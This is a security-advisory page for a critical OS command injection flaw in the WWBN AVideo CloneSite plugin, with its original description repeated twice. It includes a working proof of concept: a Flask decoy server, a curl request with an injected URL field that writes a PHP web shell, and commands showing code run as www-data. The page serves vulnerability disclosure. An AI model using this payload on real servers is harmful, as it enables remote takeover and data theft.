Monitor vulnerabilities like this one.
Sign up free to get alerted when software you use is affected.
9.9
CloneSite plugin in WWBN AVideo allows attackers to run malicious code
GHSA-xr6f-h4x7-r6qp
Summary
The CloneSite plugin in WWBN AVideo has a security flaw that allows attackers to execute malicious code on the server. This happens when an attacker tricks the plugin into running a malicious URL, which can lead to unauthorized access and potential data breaches. To fix this, update the plugin to properly sanitize user input and avoid directly concatenating it into shell commands.
What to do
No fix is available yet. Check with your software vendor for updates.
Affected software
| Ecosystem | Vendor | Product | Affected versions |
|---|---|---|---|
| Packagist | wwbn | wwbn/avideo | <= 29.0 |
Original title
WWBN AVideo: RCE cause by clonesite plugin
Original description
Description
## Summary
The `cloneServer.json.php` endpoint in the CloneSite plugin constructs shell commands using user-controlled input (`url` parameter) without proper sanitization. The input is directly concatenated into a `wget` command executed via `exec()`, allowing command injection.
An attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., `;`). This leads to **Remote Code Execution (RCE)** on the server.
## Details
Inside `plugin/CloneSite/cloneClient.json.php`(line112) didn't have proper sanitization
```php
$objClone->cloneSiteURL = str_replace("'", '', escapeshellarg($objClone->cloneSiteURL));
```
use `str_replace ` make `'` added by `escapeshellarg` become ` ` so hacker can inject evil `cloneSiteURL` to rce
```php
$sqlURL = "{$objClone->cloneSiteURL}videos/clones/{$json->sqlFile}"; \\116
$cmd = "wget -O {$sqlFile} {$sqlURL}"; \\117
exec($cmd . " 2>&1", $output, $return_val); \\119
```
The attack flow
1. make a evil site to provide date
2. add evil url in `objects/pluginAddDataObject.json.php`
3. access `plugin/CloneSite/cloneClient.json.php` to trigger rce
## Poc
make a evil site use python like this
```python
from flask import Flask, jsonify, request
app = Flask(__name__)
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def catch_all(path):
print("PATH:", path)
return jsonify({
"error": False,
"msg": "",
"url": "http://target-site.com/",
"key": "target_clone_key",
"useRsync": 0,
"videosDir": "/var/www/html/AVideo/videos/",
"sqlFile": "Clone_mysqlDump_evil123.sql",
"videoFiles": [],
"photoFiles": []
})
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8071)
```
change url with payload like (need admin)
```shell
curl -b 'PHPSESSID=<admin_session>'
-X POST "http://127.0.0.1/objects/pluginAddDataObject.json.php" \
-H "Content-Type: application/json" \
-d '{
"cloneSiteURL":"http://127.0.0.1:8071/;echo${IFS}\"<?=system(\\$_POST[1])?>\"${IFS}>1.php;/",
"cloneSiteSSHIP":"127.0.0.1",
"cloneSiteSSHUser":"1",
"cloneSiteSSHPort":"22",
"cloneSiteSSHPassword":{
"type":"encrypted",
"value":"cU1SVkhSVkxqMmxDZlUrSFhNZnRvcFBtTmI3UXNGZ0VFVWxlLzdJL0pjWGFiVXgyb2Iyci9OOE5LN0p6TmN6Zg=="
},
"useRsync":true,
"MaintenanceMode":false,
"myKey":"ba882541262f3202ee5a5ad790ae5b70"
}'
#inject evil code
curl "http://127.0.0.1/plugin/CloneSite/cloneClient.json.php" #trigger rce to write 1.php
curl "http://127.0.0.1/plugin/CloneSite/1.php"
-d '1=id'
#uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
this payload is to create a web shell
then access `plugin/CloneSite/cloneClient.json.php`
`1.php`will be created
## impact
- **Remote Code Execution**: An attacker can write arbitrary PHP code to any writable web-accessible directory, achieving full server compromise.
- **Full server compromise**: With arbitrary PHP execution as the web server user, the attacker can read/modify the database, access all user data, pivot to other services, and potentially escalate privileges on the host.
## Recommended Fix
add more powerful sanitization for `$objClone->cloneSiteURL`
## Summary
The `cloneServer.json.php` endpoint in the CloneSite plugin constructs shell commands using user-controlled input (`url` parameter) without proper sanitization. The input is directly concatenated into a `wget` command executed via `exec()`, allowing command injection.
An attacker can inject arbitrary shell commands by breaking out of the intended URL context using shell metacharacters (e.g., `;`). This leads to **Remote Code Execution (RCE)** on the server.
## Details
Inside `plugin/CloneSite/cloneClient.json.php`(line112) didn't have proper sanitization
```php
$objClone->cloneSiteURL = str_replace("'", '', escapeshellarg($objClone->cloneSiteURL));
```
use `str_replace ` make `'` added by `escapeshellarg` become ` ` so hacker can inject evil `cloneSiteURL` to rce
```php
$sqlURL = "{$objClone->cloneSiteURL}videos/clones/{$json->sqlFile}"; \\116
$cmd = "wget -O {$sqlFile} {$sqlURL}"; \\117
exec($cmd . " 2>&1", $output, $return_val); \\119
```
The attack flow
1. make a evil site to provide date
2. add evil url in `objects/pluginAddDataObject.json.php`
3. access `plugin/CloneSite/cloneClient.json.php` to trigger rce
## Poc
make a evil site use python like this
```python
from flask import Flask, jsonify, request
app = Flask(__name__)
@app.route('/', defaults={'path': ''})
@app.route('/<path:path>')
def catch_all(path):
print("PATH:", path)
return jsonify({
"error": False,
"msg": "",
"url": "http://target-site.com/",
"key": "target_clone_key",
"useRsync": 0,
"videosDir": "/var/www/html/AVideo/videos/",
"sqlFile": "Clone_mysqlDump_evil123.sql",
"videoFiles": [],
"photoFiles": []
})
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8071)
```
change url with payload like (need admin)
```shell
curl -b 'PHPSESSID=<admin_session>'
-X POST "http://127.0.0.1/objects/pluginAddDataObject.json.php" \
-H "Content-Type: application/json" \
-d '{
"cloneSiteURL":"http://127.0.0.1:8071/;echo${IFS}\"<?=system(\\$_POST[1])?>\"${IFS}>1.php;/",
"cloneSiteSSHIP":"127.0.0.1",
"cloneSiteSSHUser":"1",
"cloneSiteSSHPort":"22",
"cloneSiteSSHPassword":{
"type":"encrypted",
"value":"cU1SVkhSVkxqMmxDZlUrSFhNZnRvcFBtTmI3UXNGZ0VFVWxlLzdJL0pjWGFiVXgyb2Iyci9OOE5LN0p6TmN6Zg=="
},
"useRsync":true,
"MaintenanceMode":false,
"myKey":"ba882541262f3202ee5a5ad790ae5b70"
}'
#inject evil code
curl "http://127.0.0.1/plugin/CloneSite/cloneClient.json.php" #trigger rce to write 1.php
curl "http://127.0.0.1/plugin/CloneSite/1.php"
-d '1=id'
#uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data)
```
this payload is to create a web shell
then access `plugin/CloneSite/cloneClient.json.php`
`1.php`will be created
## impact
- **Remote Code Execution**: An attacker can write arbitrary PHP code to any writable web-accessible directory, achieving full server compromise.
- **Full server compromise**: With arbitrary PHP execution as the web server user, the attacker can read/modify the database, access all user data, pivot to other services, and potentially escalate privileges on the host.
## Recommended Fix
add more powerful sanitization for `$objClone->cloneSiteURL`
osv CVSS4.0
9.9
Vulnerability type
CWE-78
OS Command Injection
Published: 16 Apr 2026 · Updated: 16 Apr 2026 · First seen: 16 Apr 2026